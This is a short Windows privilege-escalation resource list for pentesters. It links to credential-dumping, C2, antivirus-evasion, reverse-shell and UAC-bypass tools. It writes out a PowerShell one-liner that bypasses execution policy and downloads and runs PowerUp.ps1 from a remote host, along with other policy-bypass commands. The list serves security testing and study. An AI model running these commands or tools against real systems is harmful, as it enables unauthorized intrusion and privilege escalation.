Windows Privilege Escalation Guide – part 1 | Tools
Tools:
Here is a list of the most common tools used by pentesters to enumerate and exploit Windows vulnerabilities.
- https://github.com/fireeye/commando-vm
- https://github.com/fdiskyou/incognito2
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/gentilkiwi/mimikatz
- https://github.com/samratashok/nishang
- https://github.com/SecureAuthCorp/impacket
- https://www.powershellempire.com/
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
- https://github.com/AusJock/Privilege-Escalation/tree/master/Windows
- PowerSploit’s PowerUp
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
- Watson – Watson is a (.NET 2.0 compliant) C# implementation of Sherlock
- (Deprecated) Sherlock – PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities
- powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
- BeRoot – Privilege Escalation Project – Windows / Linux / Mac
- Windows-Exploit-Suggester – compares the output of systeminfo against a Microsoft security bulletin database to list missing patches
- ./windows-exploit-suggester.py --update
- ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
- windows-privesc-check – Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
- WindowsExploits – Windows exploits, mostly precompiled. Not being updated.
- WindowsEnum – A Powershell Privilege Escalation Enumeration Script.
- Seatbelt – A C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
- Powerless – Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind
- JAWS – Just Another Windows (Enum) Script
- http://pentestit.com/list-of-open-source-c2-post-exploitation-frameworks/
- powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
- https://github.com/nccgroup/redsnarf
- https://github.com/Dhayalanb/windows-php-reverse-shell
- https://github.com/govolution/avet
- https://www.shellterproject.com/
- https://github.com/paranoidninja/CarbonCopy
- https://github.com/Exploit-install/shellsploit-framework
- https://immunityinc.com/products/debugger/
- https://github.com/hausec/ADAPE-Script
- https://github.com/BloodHoundAD/BloodHound/wiki
- https://github.com/foxglovesec/Potato
- https://github.com/BorjaMerino/Pazuzu
- https://github.com/zerosum0x0/koadic
- https://github.com/enigma0x3/Powershell-C2
- https://cobbr.io/Covenant.html
- https://github.com/cobbr/Covenant/wiki
- https://github.com/its-a-feature/Apfell
- https://www.factionc2.com/
- https://github.com/klinix5/UAC_Bypass
- https://github.com/L3cr0f/DccwBypassUAC#4-metasploit-module